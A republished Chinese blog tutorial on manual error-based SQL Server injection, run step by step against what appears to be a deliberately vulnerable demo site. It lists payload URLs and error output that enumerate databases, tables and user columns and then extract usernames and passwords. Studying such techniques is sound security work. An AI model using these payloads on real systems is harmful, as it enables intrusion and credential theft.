zoukankan      html  css  js  c++  java
  • sql server手工注入

    sql server手工注入

    测试网站testasp.vulnweb.com

    1.

    http://testasp.vulnweb.com/showforum.asp?id=0

    http://testasp.vulnweb.com/showforum.asp?id=0'

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2

    2.数据库版本

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select @@version)

    3.数据库名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select db_name())

    4.第一个数据库

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4)

    返回Conversion failed when converting the nvarchar value 'acublog' to data type int

    5.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog')

    返回Conversion failed when converting the nvarchar value 'acuforum' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum')

    返回Conversion failed when converting the nvarchar value 'acuservice' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'acublog' and name<> 'acuforum' and name<> 'acuservice')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    那就这几个数据库了

    6.获取表名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u')

    返回Conversion failed when converting the nvarchar value 'threads' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads')

    返回Conversion failed when converting the nvarchar value 'users' to data type int

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users')

    返回Conversion failed when converting the nvarchar value 'forums' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums')

    返回Conversion failed when converting the nvarchar value 'posts' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype='u' and name<> 'threads' and name<> 'users' and name<> 'forums' and name<> 'posts')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    7.users的列名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users'))

    返回Conversion failed when converting the nvarchar value 'uname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname')

    返回Conversion failed when converting the nvarchar value 'upass' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass')

    返回Conversion failed when converting the nvarchar value 'email' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email')

    返回Conversion failed when converting the nvarchar value 'realname' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname')

    返回Conversion failed when converting the nvarchar value 'avatar' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name<> 'uname' and name<> 'upass' and name<> 'email' and name<> 'realname' and name<> 'avatar')

    返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    forums的列名

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'forums'))

    8.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users)

    返回Conversion failed when converting the nvarchar value '--' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 upass from users)

    返回Conversion failed when converting the nvarchar value 'none' to data type int.

    http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname  from users where id =2)

    返回

  • 相关阅读:
    sqlalchemy 查询姿势总结
    sqlalchemy 常用总结
    rsyslog 移植与配置方案介绍
    软件设计随想录
    C语言面对对象设计模式汇编
    关于linux kernel slab内存管理的一点思考
    linux PMBus总线及设备驱动分析
    Linux x86_64 APIC中断路由机制分析
    单板控制领域模型设计与实现
    Linux mips64r2 PCI中断路由机制分析
  • 原文地址:https://www.cnblogs.com/nightnine/p/5479900.html
Copyright © 2011-2022 走看看